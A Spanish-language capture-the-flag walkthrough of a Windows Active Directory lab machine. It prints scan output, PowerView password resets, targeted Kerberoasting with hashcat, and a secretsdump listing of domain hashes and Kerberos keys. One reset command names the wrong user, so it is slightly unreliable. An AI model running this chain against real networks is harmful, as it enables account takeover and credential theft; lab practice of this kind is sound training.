Administrator
| Sistema operativo | Dificultad | Fecha de Lanzamiento | Creador |
|---|---|---|---|
| Windows | Medium | 09 Noviembre 2024 | nirza |
Credenciales
| Usuario | Contraseña |
|---|---|
| Olivia | ichliebedich |
Escaneo de puertos
nmap -sS -p- --open -Pn -n --min-rate 5000 -oG openPorts -vvv 10.10.11.42
Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-13 03:07 -03
Initiating SYN Stealth Scan at 03:07
Scanning 10.10.11.42 [65535 ports]
Discovered open port 445/tcp on 10.10.11.42
Discovered open port 53/tcp on 10.10.11.42
Discovered open port 135/tcp on 10.10.11.42
Discovered open port 21/tcp on 10.10.11.42
Discovered open port 139/tcp on 10.10.11.42
Discovered open port 9389/tcp on 10.10.11.42
Discovered open port 49667/tcp on 10.10.11.42
Discovered open port 54428/tcp on 10.10.11.42
Discovered open port 49665/tcp on 10.10.11.42
Discovered open port 61964/tcp on 10.10.11.42
Discovered open port 5985/tcp on 10.10.11.42
Discovered open port 61937/tcp on 10.10.11.42
Discovered open port 389/tcp on 10.10.11.42
Discovered open port 49664/tcp on 10.10.11.42
Discovered open port 47001/tcp on 10.10.11.42
Discovered open port 61953/tcp on 10.10.11.42
Discovered open port 3269/tcp on 10.10.11.42
Discovered open port 636/tcp on 10.10.11.42
Discovered open port 49669/tcp on 10.10.11.42
Discovered open port 61941/tcp on 10.10.11.42
Discovered open port 593/tcp on 10.10.11.42
Discovered open port 49666/tcp on 10.10.11.42
Discovered open port 464/tcp on 10.10.11.42
Discovered open port 88/tcp on 10.10.11.42
Discovered open port 3268/tcp on 10.10.11.42
Completed SYN Stealth Scan at 03:08, 20.24s elapsed (65535 total ports)
Nmap scan report for 10.10.11.42
Host is up, received user-set (0.20s latency).
Scanned at 2025-04-13 03:07:47 -03 for 20s
Not shown: 64500 closed tcp ports (reset), 1010 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE REASON
21/tcp open ftp syn-ack ttl 127
53/tcp open domain syn-ack ttl 127
88/tcp open kerberos-sec syn-ack ttl 127
135/tcp open msrpc syn-ack ttl 127
139/tcp open netbios-ssn syn-ack ttl 127
389/tcp open ldap syn-ack ttl 127
445/tcp open microsoft-ds syn-ack ttl 127
464/tcp open kpasswd5 syn-ack ttl 127
593/tcp open http-rpc-epmap syn-ack ttl 127
636/tcp open ldapssl syn-ack ttl 127
3268/tcp open globalcatLDAP syn-ack ttl 127
3269/tcp open globalcatLDAPssl syn-ack ttl 127
5985/tcp open wsman syn-ack ttl 127
9389/tcp open adws syn-ack ttl 127
47001/tcp open winrm syn-ack ttl 127
49664/tcp open unknown syn-ack ttl 127
49665/tcp open unknown syn-ack ttl 127
49666/tcp open unknown syn-ack ttl 127
49667/tcp open unknown syn-ack ttl 127
49669/tcp open unknown syn-ack ttl 127
54428/tcp open unknown syn-ack ttl 127
61937/tcp open unknown syn-ack ttl 127
61941/tcp open unknown syn-ack ttl 127
61953/tcp open unknown syn-ack ttl 127
61964/tcp open unknown syn-ack ttl 127
Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 20.32 seconds
Raw packets sent: 99325 (4.370MB) | Rcvd: 65323 (2.613MB)
Enumeración de versión y servicio
nmap -sCV -p21,53,88,135,139,389,445,464,593,636,3268,3269,5985,9389,47001,49664,49665,49666,49667,49669,54428,61937,61941,61953,61964 -oN servicesScan 10.10.11.42
Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-13 03:08 -03
Nmap scan report for 10.10.11.42 (10.10.11.42)
Host is up (0.15s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-syst:
|_ SYST: Windows_NT
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-04-13 06:08:27Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
54428/tcp open msrpc Microsoft Windows RPC
61937/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
61941/tcp open msrpc Microsoft Windows RPC
61953/tcp open msrpc Microsoft Windows RPC
61964/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2025-04-13T06:09:22
|_ start_date: N/A
|_clock-skew: -1s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 73.28 seconds
Explotación inicial
echo '10.10.11.42 administrator.htb' >> /etc/hosts
Enumeración de usuarios.
Enumeramos por LDAP usando ldapdomiandump
ldapdomaindump -u 'administrator.htb\olivia' -p 'ichliebedich' 10.10.11.42
Enumeramos por bloodhound.
bloodhound-python -u 'olivia' -p 'ichliebedich' -d administrator.htb -ns 10.10.11.42 --zip -c All
Cambiamos la contraseña del usuario michael.
Subimos PoweView a la máquina víctima.
$UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
Set-DomainUserPassword -Identity michael -AccountPassword $UserPassword
Volvemos a enumerar por bloodhound.
El usuario michael puede cambiar la contraseña del usuario Benjamin.
$UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
Set-DomainUserPassword -Identity michael -AccountPassword $UserPassword
FTP (21)
emily:UXLCI5iETUsIBoFVTj8yQFKoHjXmb
Ingresamos a través de winrm a el DC.
Para abusar de este permiso GenericWrite lo que podemos hacer es Asignar un SPN falso a la cuenta de ethan para luego obtener el TGS y crackearlo.
Import-module .\PowerView.ps1
Set-DomainObject -Identity <USER> -SET @{serviceprincipalname='nonexistent/BLAHBLAH'}
hashcat -m 13100 ethan_hash.txt /usr/share/wordlists/rockyou.txt
Escalación de privilegios root/SYSTEM
ethan:limpbizkit
┌──(root㉿kali)-[/home/kali/htb/Administrator/content]
└─# impacket-secretsdump administrator.htb/ethan:limpbizkit@10.10.11.42
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:3dc553ce4b9fd20bd016e098d2d2fd2e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:1181ba47d45fa2c76385a82409cbfaf6:::
administrator.htb\olivia:1108:aad3b435b51404eeaad3b435b51404ee:fbaa3e2294376dc0f5aeb6b41ffa52b7:::
administrator.htb\michael:1109:aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe:::
administrator.htb\benjamin:1110:aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe:::
administrator.htb\emily:1112:aad3b435b51404eeaad3b435b51404ee:eb200a2583a88ace2983ee5caa520f31:::
administrator.htb\ethan:1113:aad3b435b51404eeaad3b435b51404ee:5c2b9f97e0620c3d307de85a93179884:::
administrator.htb\alexander:3601:aad3b435b51404eeaad3b435b51404ee:cdc9e5f3b0631aa3600e0bfec00a0199:::
administrator.htb\emma:3602:aad3b435b51404eeaad3b435b51404ee:11ecd72c969a57c34c819b41b54455c9:::
DC$:1000:aad3b435b51404eeaad3b435b51404ee:cf411ddad4807b5b4a275d31caa1d4b3:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:9d453509ca9b7bec02ea8c2161d2d340fd94bf30cc7e52cb94853a04e9e69664
Administrator:aes128-cts-hmac-sha1-96:08b0633a8dd5f1d6cbea29014caea5a2
Administrator:des-cbc-md5:403286f7cdf18385
krbtgt:aes256-cts-hmac-sha1-96:920ce354811a517c703a217ddca0175411d4a3c0880c359b2fdc1a494fb13648
krbtgt:aes128-cts-hmac-sha1-96:aadb89e07c87bcaf9c540940fab4af94
krbtgt:des-cbc-md5:2c0bc7d0250dbfc7
administrator.htb\olivia:aes256-cts-hmac-sha1-96:713f215fa5cc408ee5ba000e178f9d8ac220d68d294b077cb03aecc5f4c4e4f3
administrator.htb\olivia:aes128-cts-hmac-sha1-96:3d15ec169119d785a0ca2997f5d2aa48
administrator.htb\olivia:des-cbc-md5:bc2a4a7929c198e9
administrator.htb\michael:aes256-cts-hmac-sha1-96:7a206ee05e894781b99a0175a7fe6f7e1242913b2ab72d0a797cc45968451142
administrator.htb\michael:aes128-cts-hmac-sha1-96:b0f3074aa15482dc8b74937febfa9c7e
administrator.htb\michael:des-cbc-md5:2586dc58c47c61f7
administrator.htb\benjamin:aes256-cts-hmac-sha1-96:36cfe045bc49eda752ca34dd62d77285b82b8c8180c3846a09e4cb13468433a9
administrator.htb\benjamin:aes128-cts-hmac-sha1-96:2cca9575bfa7174d8f3527c7e77526e5
administrator.htb\benjamin:des-cbc-md5:49376b671fadf4d6
administrator.htb\emily:aes256-cts-hmac-sha1-96:53063129cd0e59d79b83025fbb4cf89b975a961f996c26cdedc8c6991e92b7c4
administrator.htb\emily:aes128-cts-hmac-sha1-96:fb2a594e5ff3a289fac7a27bbb328218
administrator.htb\emily:des-cbc-md5:804343fb6e0dbc51
administrator.htb\ethan:aes256-cts-hmac-sha1-96:e8577755add681a799a8f9fbcddecc4c3a3296329512bdae2454b6641bd3270f
administrator.htb\ethan:aes128-cts-hmac-sha1-96:e67d5744a884d8b137040d9ec3c6b49f
administrator.htb\ethan:des-cbc-md5:58387aef9d6754fb
administrator.htb\alexander:aes256-cts-hmac-sha1-96:b78d0aa466f36903311913f9caa7ef9cff55a2d9f450325b2fb390fbebdb50b6
administrator.htb\alexander:aes128-cts-hmac-sha1-96:ac291386e48626f32ecfb87871cdeade
administrator.htb\alexander:des-cbc-md5:49ba9dcb6d07d0bf
administrator.htb\emma:aes256-cts-hmac-sha1-96:951a211a757b8ea8f566e5f3a7b42122727d014cb13777c7784a7d605a89ff82
administrator.htb\emma:aes128-cts-hmac-sha1-96:aa24ed627234fb9c520240ceef84cd5e
administrator.htb\emma:des-cbc-md5:3249fba89813ef5d
DC$:aes256-cts-hmac-sha1-96:98ef91c128122134296e67e713b233697cd313ae864b1f26ac1b8bc4ec1b4ccb
DC$:aes128-cts-hmac-sha1-96:7068a4761df2f6c760ad9018c8bd206d
DC$:des-cbc-md5:f483547c4325492a
[*] Cleaning up...
Post Explotación
